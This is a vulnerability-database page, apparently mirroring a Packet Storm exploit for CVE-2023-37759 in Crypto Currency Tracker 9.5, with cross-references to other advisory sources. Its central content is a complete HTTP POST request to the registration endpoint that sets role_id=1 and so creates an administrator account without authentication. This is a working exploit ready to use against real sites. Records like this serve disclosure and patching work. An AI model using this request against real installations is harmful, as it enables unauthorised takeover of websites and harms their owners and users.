Crypto Currency Tracker (CCT) 9.5 Add Administrator

🗓️ 21 Aug 2023 00:00:00Reported by 0xBrType

packetstorm🔗 packetstormsecurity.com👁 306 Views

Crypto Currency Tracker (CCT) 9.5 Add Administrator Exploi

Reporter	Title	Published	Views	Family All 13
0day.today	Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated) Vulnerability	21 Aug 202300:00	–	zdt
ATTACKERKB	CVE-2023-37759	8 Sep 202303:15	–	attackerkb
Circl	CVE-2023-37759	8 Sep 202307:19	–	circl
CNNVD	Codecanyon Crypto Currency Tracker 安全漏洞	21 Aug 202300:00	–	cnnvd
CVE	CVE-2023-37759	8 Sep 202300:00	–	cve
Cvelist	CVE-2023-37759	8 Sep 202300:00	–	cvelist
Exploit DB	Crypto Currency Tracker (CCT) 9.5 - Admin Account Creation (Unauthenticated)	21 Aug 202300:00	–	exploitdb
EUVD	EUVD-2023-41635	3 Oct 202520:07	–	euvd
NVD	CVE-2023-37759	8 Sep 202303:15	–	nvd
OSV	CVE-2023-37759	8 Sep 202303:15	–	osv

`# Exploit Title: Crypto Currency Tracker (CCT) - Admin Account Creation (Unauthenticated)  
# Date: 11.08.2023  
# Exploit Author: 0xBr  
# Software Link: https://codecanyon.net/item/crypto-currency-tracker-prices-charts-news-icos-info-and-more/21588008  
# Version: <=9.5  
# CVE: CVE-2023-37759  
  
POST /en/user/register HTTP/2  
Host: localhost  
Cookie: XSRF-TOKEN=[TOKEN]; laravel_session=[LARAVEL_SESSION]; SELECTED_CURRENCY=USD; SELECTED_CURRENCY_PRICE=1; cookieconsent_status=dismiss  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-GB,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 756  
  
_token=[_TOKEN]&name=testing&role_id=1&email=testing%40testing.testing&password=testing&g-recaptcha-response=[G-RECAPTCHA-RESPONSE]&submit_register=Register  
  
`

21 Aug 2023 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.03748